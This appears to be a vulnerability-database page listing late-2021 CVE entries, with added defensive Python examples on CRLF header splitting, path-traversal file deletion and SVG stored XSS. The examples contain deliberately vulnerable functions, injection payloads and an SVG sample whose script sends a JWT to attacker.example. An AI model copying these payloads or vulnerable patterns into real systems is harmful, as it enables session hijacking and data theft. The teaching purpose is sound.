Vulnerabilities

To inform, warn and help professionals keep up with the latest security vulnerabilities in technology systems, we make a database available to users interested in this information. It is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 records, is based on the information from the NVD (National Vulnerability Database) under a partnership agreement through which INCIBE translates the information it contains into Spanish.

Occasionally this list will show vulnerabilities that have not yet been translated, because entries are added while the INCIBE team is still carrying out the translation. The CVE (Common Vulnerabilities and Exposures) standard for naming information security vulnerabilities is used so that information can be exchanged between different tools and databases.

Every vulnerability collected is linked to its information sources, as well as to any patches or solutions made available by manufacturers and developers. Advanced searches are possible: you can select different criteria, such as vulnerability type, manufacturer and impact level, to narrow down the results.

Through RSS feeds or newsletters you can be informed daily about the latest vulnerabilities added to the repository. Below is a list, updated daily, of the latest vulnerabilities.

CVE-2021-45379

Publication date:
30/12/2021
Glewlwyd 2.0.0, fixed in 2.6.1, is affected by an incorrect access control vulnerability. One user can attempt to log in as another user without that user's password.
Severity CVSS v4.0: Pending analysis
Last modification:
12/07/2022

CVE-2021-38876

Publication date:
30/12/2021
IBM i 7.2, 7.3, and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208404.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2020-29292

Publication date:
30/12/2021
iBall WRD12EN 1.0.0 devices allow cross-site request forgery (CSRF) attacks as demonstrated by enabling DNS settings or modifying the range for IP addresses.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2021-43862

Publication date:
30/12/2021
jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. Versions prior to 2.31.1 contain a low-impact and limited cross-site scripting (XSS) vulnerability. The code for the XSS payload is always visible, but an attacker can use other techniques to hide the code the victim sees. If the application uses the `execHash` option and executes code from the URL, the attacker can use this URL to execute their code. The scope is limited because the JavaScript attribute used is added to a span tag, so no automatic execution like with `onerror` on images is possible. This issue is fixed in version 2.31.1. As a workaround, the user can use a formatter that wraps the whole user input and is a no-op. The code for this workaround is available in the GitHub Security Advisory. The fix will only work when the user of the library is not using different formatters (e.g. to highlight code in a different way).
Severity CVSS v4.0: Pending analysis
Last modification:
09/08/2022

CVE-2021-43861

Publication date:
30/12/2021
Mermaid is a JavaScript-based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams. Prior to version 8.13.8, malicious diagrams can run JavaScript code on diagram readers' machines. Users should upgrade to version 8.13.8 to receive a patch. There are no known workarounds aside from upgrading.
Severity CVSS v4.0: Pending analysis
Last modification:
21/07/2023

CVE-2021-45815

Publication date:
30/12/2021
Quectel UC20 UMTS/HSPA+ UC20 6.3.14 is affected by a Cross Site Scripting (XSS) vulnerability.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2021-45818

Publication date:
30/12/2021
SAFARI Montage 8.7.32 is affected by a CRLF injection vulnerability which can lead to HTTP response splitting.
Severity CVSS v4.0: Pending analysis
Last modification:
20/01/2023
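
The CRLF injection in the SAFARI Montage entry above is a generic pattern, so here is an added example that is not SAFARI Montage code and not taken from the advisory: a small Python script that builds an HTTP redirect from a caller-supplied header value, shows how a CR/LF pair in that value splits the header block into an extra header a client will honour, and applies the check that rejects such values. The ATTACKER_LOCATION payload and the response builder are constructed for the demonstration.

```python
# Added example (not SAFARI Montage code): how a CR/LF pair inside a
# header value splits an HTTP response, and the check that blocks it.
from __future__ import annotations

CRLF = "\r\n"


def build_redirect_unsafe(location: str, body: bytes = b"") -> bytes:
    """Vulnerable builder: the caller-supplied value is pasted into the
    header block unchanged, so CR/LF inside it start new header lines."""
    head = (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + location + CRLF
        + "Content-Length: " + str(len(body)) + CRLF
        + CRLF
    )
    return head.encode("latin-1") + body


def validate_header_value(value: str) -> str:
    """Hardened check: refuse any CR, LF or NUL in a header value.
    Modern HTTP libraries perform the same check before emitting headers."""
    if any(ch in value for ch in "\r\n\x00"):
        raise ValueError("CR, LF or NUL not allowed in header value")
    return value


def build_redirect_safe(location: str, body: bytes = b"") -> bytes:
    """Same builder, but every attacker-influenced value is validated first."""
    return build_redirect_unsafe(validate_header_value(location), body)


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Minimal parser showing which headers a client would actually see."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.decode("latin-1").split(CRLF)[1:]:  # skip the status line
        name, _, value = line.partition(": ")
        headers.append((name, value))
    return headers


# Constructed attacker input: a redirect target that smuggles a cookie header.
ATTACKER_LOCATION = "/home" + CRLF + "Set-Cookie: session=attacker-chosen"


def demo() -> dict:
    """Run both builders against the payload and report what happened."""
    seen = parse_headers(build_redirect_unsafe(ATTACKER_LOCATION))
    try:
        build_redirect_safe(ATTACKER_LOCATION)
        blocked = False
    except ValueError:
        blocked = True
    return {"unsafe_headers": seen, "safe_blocked": blocked}


if __name__ == "__main__":
    for name, value in demo()["unsafe_headers"]:
        print(f"{name}: {value}")
```

The unsafe builder emits the attacker's Set-Cookie as a header of its own; the same trick can inject a whole second response when the injected text ends the header block. Rejecting the bytes is the right fix: encoding or stripping them silently tends to break legitimate values and hides the attempted attack from logs.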

CVE-2021-45427

Publication date:
30/12/2021
Emerson XWEB 300D EVO 3.0.7--3ee403 is affected by: unauthenticated arbitrary file deletion due to path traversal. An attacker can browse and delete files without any authentication due to incorrect access control and directory traversal.
Severity CVSS v4.0: Pending analysis
Last modification:
11/01/2022
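
The Emerson XWEB entry above combines two defects, a missing authentication check and a path that is used as supplied. As an added example, not Emerson code and not from the advisory, here is a Python file-deletion handler in its vulnerable form next to a hardened one that requires a session and confines the path to the intended directory. The directory layout, the session dictionary and the "../config.txt" payload are constructed for the demonstration.

```python
# Added example (not Emerson XWEB code): a file-deletion handler that trusts
# a client-supplied path and skips authentication, next to one that requires
# a session and confines the path to the intended directory.
from __future__ import annotations

import os
import tempfile


def resolve_under_base(base_dir: str, user_path: str) -> str:
    """Return the real path of user_path inside base_dir, or raise ValueError
    if it escapes (via '..', an absolute path, or a symlink pointing out)."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def delete_file_unsafe(base_dir: str, user_path: str) -> bool:
    """Vulnerable: no authentication and a naive join, so '../' walks out of base."""
    target = os.path.join(base_dir, user_path)
    if os.path.isfile(target):
        os.remove(target)
        return True
    return False


def delete_file_safe(base_dir: str, user_path: str, session: dict | None) -> bool:
    """Hardened: require an authenticated session, then confine the path."""
    if not session or not session.get("authenticated"):
        raise PermissionError("authentication required")
    target = resolve_under_base(base_dir, user_path)
    if os.path.isfile(target):
        os.remove(target)
        return True
    return False


def _touch(path: str) -> None:
    with open(path, "w") as fh:
        fh.write("x")


def demo() -> dict:
    """Build a throwaway tree and run both handlers against a traversal payload."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "www", "uploads")    # the only directory deletion should touch
    os.makedirs(uploads)
    secret = os.path.join(root, "www", "config.txt")  # constructed file outside uploads
    _touch(secret)
    payload = "../config.txt"                          # constructed traversal payload
    results = {}

    results["unsafe_deleted_secret"] = delete_file_unsafe(uploads, payload)
    _touch(secret)  # put it back for the hardened runs

    try:
        delete_file_safe(uploads, payload, None)
        results["unauth_rejected"] = False
    except PermissionError:
        results["unauth_rejected"] = True

    try:
        delete_file_safe(uploads, payload, {"authenticated": True})
        results["traversal_rejected"] = False
    except ValueError:
        results["traversal_rejected"] = True
    results["secret_survives"] = os.path.exists(secret)

    _touch(os.path.join(uploads, "report.pdf"))
    results["legit_deleted"] = delete_file_safe(uploads, "report.pdf", {"authenticated": True})
    return results


if __name__ == "__main__":
    print(demo())
```

The check resolves symlinks on both sides before comparing, which is what a plain string prefix test misses, and it compares whole path components so that a base of /www/uploads does not accept /www/uploads2. Authentication is checked before the path is even looked at, so an unauthenticated caller learns nothing about which paths exist.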

CVE-2021-4188

Publication date:
30/12/2021
mruby is vulnerable to NULL Pointer Dereference
Severity CVSS v4.0: Pending analysis
Last modification:
06/01/2022

CVE-2021-43876

Publication date:
29/12/2021
Microsoft SharePoint Elevation of Privilege Vulnerability
Severity CVSS v4.0: Pending analysis
Last modification:
28/12/2023

CVE-2021-36724

Publication date:
29/12/2021
ForeScout - SecureConnector Local Service DoS - A low-privileged user who does not have permission to shut down the Secure Connector service writes a large number of characters into installationPath. This causes the buffer to overflow and overwrites the stack cookie, causing the service to crash.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2022

CVE-2021-25993

Publication date:
29/12/2021
In Requarks wiki.js, versions 2.0.0-beta.147 to 2.5.255 are affected by a stored XSS vulnerability, where a low-privileged (editor) user can upload an SVG file that contains malicious JavaScript while uploading assets to the page. That will send the JWT tokens to the attacker's server and will lead to account takeover when accessed by the victim.
Severity CVSS v4.0: Pending analysis
Last modification:
06/01/2022
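
The wiki.js entry above is the classic SVG-upload variant of stored XSS: an SVG is an XML document that may carry script elements, event-handler attributes and javascript: URLs, and a browser will run them when the file is opened in a document context. As an added example that is not wiki.js code and not from the advisory, here is a Python check an upload handler can run before storing an SVG asset. The two sample SVGs are constructed; the element and attribute names are a denylist of the usual script carriers, so serving user uploads from a separate origin (or with Content-Disposition: attachment) remains the stronger control.

```python
# Added example (not wiki.js code): inspect an uploaded SVG for script-capable
# content before storing it, so an asset cannot run JavaScript in a viewer's
# session. This is a denylist of the common script carriers, not a full sanitizer.
from __future__ import annotations

import xml.etree.ElementTree as ET  # prefer defusedxml.ElementTree in production against entity attacks

ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1].lower()


def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return findings; an empty list means no script carrier was found."""
    findings: list[str] = []
    root = ET.fromstring(svg_bytes)
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            # Normalise the way browsers do before scheme matching: drop whitespace, lowercase.
            scheme_view = "".join(value.split()).lower()
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif scheme_view.startswith("javascript:") or scheme_view.startswith("data:text/html"):
                findings.append(f'{name}="{value}" on <{tag}>')
    return findings


def accept_upload(svg_bytes: bytes) -> bool:
    """Upload-handler decision: well-formed XML with no findings is accepted."""
    try:
        return not find_active_content(svg_bytes)
    except ET.ParseError:
        return False  # not well-formed XML: reject rather than guess what a browser would do


# Constructed samples (not taken from the advisory).
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
    b'<circle cx="5" cy="5" r="4" fill="red"/></svg>'
)

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>fetch("https://attacker.example/?t=" + localStorage.getItem("jwt"))</script>
  <a xlink:href="javascript:alert(1)"><text x="5" y="10">click</text></a>
  <circle cx="5" cy="5" r="4" onload="alert(2)"/>
</svg>"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, accept_upload(sample), find_active_content(sample))
```

The check walks every element and attribute rather than matching on a regular expression over the raw bytes, so namespace prefixes, attribute order and whitespace inside the markup do not hide a carrier. What it does not cover is content pulled in through CSS (a style element with an @import) or an animate/set element that rewrites an href at runtime; if uploads must be rendered inline, run them through a dedicated SVG sanitizer and serve them with a Content-Security-Policy that disallows script.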